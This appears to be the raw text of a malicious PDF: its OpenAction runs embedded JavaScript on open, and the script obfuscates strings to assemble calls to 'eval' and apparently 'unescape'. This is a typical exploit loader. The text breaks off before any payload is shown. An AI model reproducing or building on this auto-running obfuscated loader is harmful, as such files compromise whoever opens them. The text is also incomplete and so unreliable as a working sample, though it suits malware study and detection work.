%PDF-1.3
%&#1074;&#1075;&#1055;&#1059;
1 0 obj
<<
/Outlines 2 0 R
/OpenAction 3 0 R
/Pages 4 0 R
/Type /Catalog
>>
endobj
2 0 obj
<<
/Count 0
/Type /Outlines
>>
endobj
4 0 obj
<<
/Kids [5 0 R]
/Count 1
/Type /Pages
>>
endobj
5 0 obj
<<
/Parent 4 0 R
/Annots [6 0 R]
/MediaBox [0 0 612 792]
/pdftk_PageNum 1
/Type /Page
>>
endobj
6 0 obj
<<
/Subtype /Text
/Subj 7 0 R
/Name /Comment
/Type /Annot
/Rect [25 100 60 115]
>>
endobj
3 0 obj
<<
/JS 8 0 R
/Type /Action
/S /JavaScript
>>
endobj
8 0 obj
<<
/Length 3066
>>
stream

var dengidengidengi_mne_platitefakeris = "zzzepoooood".substr(3,1);
var hIUXIziOuz77 = this;
var xx=["jjjjjjjjj","ee%xxxxxxxxx","000","999999"];
var zz=xx[1].substr(2,1);
var dengidengidengi_mne_platitefakeris2 = "r"+dengidengidengi_mne_platitefakeris+"p"+"l"+"a"+"c"+dengidengidengi_mne_platitefakeris;
var dengidengidengi_mne_platitefakerisx = "v"+"z"+"l";
var uaLtcwClAA17 = hIUXIziOuz77[dengidengidengi_mne_platitefakeris+dengidengidengi_mne_platitefakerisx[dengidengidengi_mne_platitefakeris2]("z","a")];

dengidengidengi_mne_platitefakerisx = "unzz"+"zzz"+"ap";
var idRDKEimwk